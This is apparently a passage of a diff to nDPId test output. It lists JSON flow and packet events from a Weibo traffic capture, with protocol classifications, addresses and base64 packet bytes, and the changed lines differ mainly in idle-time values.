+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073789,"pkt":"kDVu60UQeJKcD6iOCABFAAA8F+ZAAEAGKbjAqAFpjM2qP7prAbvY7h2OAAAAAKACchAfhQAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": 